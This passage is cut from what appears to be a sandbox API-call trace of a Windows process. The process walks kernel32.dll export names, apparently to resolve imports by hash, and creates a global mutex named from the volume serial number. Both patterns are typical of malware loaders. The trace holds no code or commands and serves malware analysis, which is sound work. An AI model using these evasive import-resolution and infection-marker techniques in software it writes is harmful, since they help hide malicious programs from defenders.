returned="EnterCriticalSection" [0048.013] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0048.013] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0048.013] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0048.014] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0048.014] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0048.014] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0048.014] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0048.014] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0048.014] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0048.014] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0048.014] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0048.014] GetWindowsDirectoryW (in: lpBuffer=0xc9ea8c, uSize=0x200 | out: lpBuffer="C:\\Windows") returned 0xa [0048.014] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xc9e8e0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xc9e8e0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0048.014] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0048.018] wsprintfW (in: param_1=0x360000, param_2="%x%x" | out: param_1="9cda09f29c354b42") returned 16 [0048.018] GetUserDefaultUILanguage () returned 0x409 [0048.018] GetSystemDefaultLangID () returned 0x5e0409 [0048.018] GetUserDefaultLangID () returned 0x409 [0048.019] GetTickCount64 () returned 0x114517b [0048.022] wsprintfW (in: param_1=0xc9ef8c, param_2="Global\\%s" | out: param_1="Global\\9cda09f29c354b42") returned 23 [0048.022] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\9cda09f29c354b42") returned 0x1dc [0048.022] GetLastError () returned 0x0 [0048.022] GetLastError () returned 0x0 [0048.025] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x370000 [0048.028] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x390000 [0048.028] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0048.035] lstrlenA (lpString="kernel32.dll") returned 12 [0048.035] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.035] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.035] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.036] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.036] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.036] lstrlenA (lpString="ADDATOMA") returned 8 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.036] lstrlenA (lpString="ADDATOMW") returned 8 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.036] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.036] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.036] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.036] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.036] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.036] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.036] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.036] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.036] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.036] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.036] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.036] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.036] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.036] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.037] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.037] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.037] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.037] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.037] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.037] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.037] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.037] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.037] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.037] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.037] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.037] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.037] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.037] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.037] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.037] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.037] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.037] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.038] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.038] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.038] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.038] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.038] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.038] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.038] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.038] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.038] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.038] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.038] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.038] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.038] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.038] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.038] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.038] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.038] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.038] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.038] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.039] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.039] lstrlenA (lpString="BEEP") returned 4 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.039] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.039] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.039] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.039] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.039] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.039] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.039] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.039] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.039] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.039] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.039] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.039] lstrlenA (lpString="CANCELIO") returned 8 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0048.039] lstrlenA (lpString="CANCELIOEX") returned 10 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0048.039] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0048.039] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0048.039] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0048.039] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0048.039] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0048.040] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0048.040] lstrlenA (lpString="CHECKELEVATION") returned 14 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0048.040] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0048.040] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0048.040] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0048.040] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0048.040] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0048.040] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0048.040] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0048.040] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0048.040] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0048.040] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0048.040] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0048.040] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0048.040] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0048.040] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0048.040] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0048.040] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0048.040] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0048.041] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0048.041] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0048.041] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0048.041] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0048.041] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0048.041] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0048.041] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0048.041] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0048.041] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0048.041] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0048.041] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0048.041] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0048.041] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0048.041] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertCalDateTimeToSystemTime" | 